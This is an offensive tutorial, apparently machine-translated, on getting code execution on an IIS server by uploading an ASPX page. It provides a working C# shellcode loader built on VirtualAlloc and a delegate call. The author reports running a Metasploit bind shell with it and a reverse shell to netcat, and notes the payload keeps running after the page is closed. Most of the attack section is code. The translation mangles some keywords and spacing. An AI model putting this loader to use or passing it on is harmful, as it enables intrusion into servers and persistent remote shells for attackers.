Execute shellcode using ASPX

First of all, this method has some limitations, and must be used only in some special cases, such as uploading an exe file or not executing it. Environment requirements for using this method: the server supports aspx and you can upload and access aspx files to the server.

1. Basic Principles

Upload An aspx file to the server as follows:

<% @ Page Language = "C #" AutoEventWireup = "true" Inherits = "System. Web. UI. Page" %>
<% @ Import Namespace = "System" %>

<Script runat = "server">
Protected void Page_Load (object sender, EventArgs e)
{
Response. Write (Hello ());
}
Private string Hello ()
{
Return "Hello World ";
}
</Script>
Use. NET users who have worked on websites should be better aware of the implementation principles of these codes. Simply put, I put the background code in the front-end part of this page. When you access the page, the Page_Load event is triggered and the Hello () member function is called. The background code can be C # Or VB. In development. NET website, most of the website source code is xxx. aspx and xxx. aspx. cs (or xxx. aspx. vb ,. cs file or. the vb file is the corresponding background code. After a website is published, the background code is compiled into a dll file, so you cannot modify it. However, the front end can still insert background code. If both the front end and the background define the Page_Load event, microsoft also has a default rule to control the execution sequence of the two: the front-end is executed before the backend, so you don't have to worry about the code being written.

In addition, directly add xxx. aspx and xxx. aspx. the cs code can also be executed normally when stored in the website directory. I believe that you have encountered this problem sometimes, and then you can directly put the code in the cs file, the results are the same.

The execution result on the above page is:

Since the background code can be written and executed on the front end, the background code is supported. NET, you can use this to execute anything you want.. NET and permitted permissions can be written in C # Or VB.

2. Exploitation Methods

With this, you can do a lot of work, such as executing a command and starting a program. This is why you feel that aspx has higher webshell permissions than asp. Therefore, using it to execute shellcode is not difficult.

<% @ Page Language = "C #" AutoEventWireup = "true" Inherits = "System. Web. UI. Page" %>
<% @ Import Namespace = "System" %>
<% @ Import Namespace = "System. Runtime. InteropServices" %>

<Script runat = "server">
Delegate int MsfpayloadProc ();
Protected void Page_Load (object sender, EventArgs e)
{
Byte [] codeBytes = {/* Your shellcode */
};
IntPtr handle = IntPtr. Zero;
Handle = VirtualAlloc (
IntPtr. Zero,
CodeBytes. Length,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE );
Try
{
Marshal. Copy (codeBytes, 0, handle, codeBytes. Length );
MsfpayloadProc msfpayload
= Marshal. GetDelegateForFunctionPointer (handle, typeof (MsfpayloadProc) as MsfpayloadProc;
Msfpayload ();
}
Finally
{
VirtualFree (handle, 0, MEM_RELEASE );
}
}

// Windows API
[DllImport ("Kernel32.dll", EntryPoint = "VirtualAlloc")]
Public static extern IntPtr VirtualAlloc (IntPtr address, int size, uint allocType, uint protect );
[DllImport ("Kernel32.dll", EntryPoint = "VirtualFree")]
Public static extern bool VirtualFree (IntPtr address, int size, uint freeType );
// Flags
Const uint MEM_COMMIT = 0x1000;
Const uint MEM_RESERVE = 0x2000;
Const uint PAGE_EXECUTE_READWRITE = 0x40;
Const uint MEM_RELEASE = 0x8000;
</Script>
Upload the prepared aspx file and access it. The page is always displayed as a loading status. The shellcode I added to the test page is a msfpayload of bind_tcp, listening for port 65314 (by hand, It is coincidental if there are similarities ). Check whether the port is Enabled:

 

Let's look at the process again:

 

Test whether the service can be launched:

You can see that the connection is connected, but the permission is still Network Service. At this time, even if you close the shellcode. aspx page, the msfpayload is still running and the connection will not be interrupted. Of course, restart the application pool of the website and msfpayload stops running.

3. Summary

If you can escalate the permission and directly upload and run the exe file, you can skip this post regardless of the above nonsense. In addition, the shellcode run in this way has the same permissions as those of the IIS process. If shellcode executes an unauthorized operation, such as adding an administrator, the connection will be reset when accessing the page. Therefore, do not count on it for privilege escalation. If it is possible, someone else has long thought of it.

So what is the use of such a method? You can use it on your own. I don't know much about shellcode.

I used win2k3 + iis6 for testing. You are welcome to test and give feedback in other environments, including the environment where WAF is installed.

Later, I tried shellcode that rebounded shell to nc and succeeded. Shellcode is in this format: 0xfc, 0xe8, 0x89,0x00.